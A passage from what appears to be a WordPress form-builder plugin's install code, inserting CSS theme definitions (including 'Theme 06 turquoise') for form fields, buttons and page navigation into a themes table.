#fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\nui-state-hover {\r\n	background: #B05785 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\nborder-radius: 0px;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 27px;\r\n	background: url([SITE_ROOT]/images/05/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/05/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/03/nextbg.png) no-repeat;\r\n	padding: 0px 20px 0 0;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/03/nextbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/03/previousbg.png) no-repeat;\r\n	padding: 0px 0 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/03/previousbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/05/03/submit.png) no-repeat;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 32px;\r\n	color: #fff;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 500;\r\n	padding: 0 12px 0 24px;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #F6E2ED;\r\n	padding: 15px 20px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 0px;\r\n	background: #B05785;\r\n	border-radius: 0px;\r\npadding: 6px 10px 15px;\r\ntext-align: center;\r\nfont-size: 18px;\r\ncolor: #fff;\r\nbox-shadow: 0px 3px 5px #4B4B4B;\r\n}\r\n\r\n.wdform-field-section-break2:after {\r\n	content: " ";\r\n	position: relative;\r\n	width: 97.7%;\r\n	right: 0px;\r\n	bottom: 20px;\r\n	height: 4px;\r\n	-webkit-box-shadow: 0 2px 3px #444141;\r\n	-moz-box-shadow: 0 2px 3px #444141;\r\n	box-shadow: 0 2px 3px #444141;\r\n	display: inline-block;\r\n\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 0px;\r\n	border-radius: 0px;\r\n	text-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\nborder: 1px solid transparent;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border: 1px solid #B05785;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border: 1px solid #B05785;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #B05785;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #B05785;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/05/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 21px;\r\n	position: relative;\r\n	left: -19px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #B05785;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #B05785;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #D7639F;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #E47DB3;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-left: 1px;\r\n	line-height: 25px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 27px;\r\n	line-height: 27px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #D863A0 ;\r\n	background: -moz-linear-gradient(left, #D7639F 0%, #D863A0 39%, #F173B4 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #D7639F ), color-stop(39%, #D863A0 ), color-stop(100%, #F173B4 ));\r\n	background: -webkit-linear-gradient(left, #D7639F 0%, #D863A0 39%, #F173B4 100%);\r\n	background: -o-linear-gradient(left, #D7639F 0%, #D863A0 39%, #F173B4 100%);\r\n	background: -ms-linear-gradient(left, #D7639F 0%, #D863A0 39%, #F173B4 100%);\r\nbackground: linear-gradient(to right, #D7639F 0%, #D863A0 39%, #F173B4 100%);\r\n	border-top-right-radius: 9px;\r\n	border-bottom-right-radius: 9px;\r\n	box-shadow: 2px 0px 7px #9E9B9B;\r\n}\r\n.page_percentage_deactive {\r\n	height: 27px;\r\n	line-height: 27px;\r\n	background-color: #D6CAD2;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(20, \'Theme 06 turquoise\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #B1EBE9;\r\nborder: 1px solid #018580;\r\nmargin-bottom: 10px;\r\ncolor: #018580;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: transparent !important;\r\n	margin: 7px 0px;\r\nborder:1px solid #ABAAAA !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 4px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: transparent;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n	border: 1px solid #ABAAAA;\r\n	border-radius: 7px;\r\n	color: #4C4C4C;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 25px;\r\n	width: 28px;\r\n	background: url([SITE_ROOT]/images/06/01.png) no-repeat 0% 50%;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 66px;\r\n	height: 49px;\r\n	background: url([SITE_ROOT]/images/06/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page\r\n{\r\n        width:inherit !important;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/06/next.png) no-repeat right #019993;\r\n 	padding: 0px 36px 0 20px ;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #018580;\r\n\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/next.png) no-repeat right #00C5BD;\r\n}\r\n.previous-page\r\n{\r\n        width:inherit !important;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #959595;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #E8E8E8;\r\n}\r\n.previous-page div.wdform-page-button:before {\r\n	content: " ";\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left;\r\n	height: 19px;\r\n	width: 20px;\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	top: -2px;\r\n	position: relative;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #019993;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #018580;\r\n}\r\n.button-submit:hover {\r\n	background: #00C5BD;\r\n}\r\n.button-reset {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #959595;\r\n	margin-left: 5px;\r\n}\r\n.button-reset:hover {\r\n	background: #E8E8E8;\r\n}\r\n.wdform_page {\r\n	background: #B1EBE9;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #029A95;\r\n	color: #ffffff !important;\r\n	font-size: 16px;\r\n	text-align: left;\r\npadding: 7px 30px 10px;\r\n}\r\n\r\n.wdform_section_break2 p{\r\n	color: #ffffff !important;\r\n	\r\n}\r\n\r\n.wdform_section_break2:after {\r\n	content: " " ;\r\n	position: relative;\r\n	width: 16px;\r\n	height: 13px;\r\n	top: -3px;\r\n	left: 1px;\r\n	box-shadow: 0px 7px 2px #c9c9c9;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\n	margin: 16px 10px 16px 0px;\r\ncolor:#4C4C4C;\r\nfont-size: 16px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 5px;\r\n	height: 27px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ABAAAA;\r\nbackground: transparent;\r\ncolor: #5C5C5C;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="password"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ntextarea {\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="text"]:focus{\r\n	border: 1px solid #029A95;\r\n	outline: 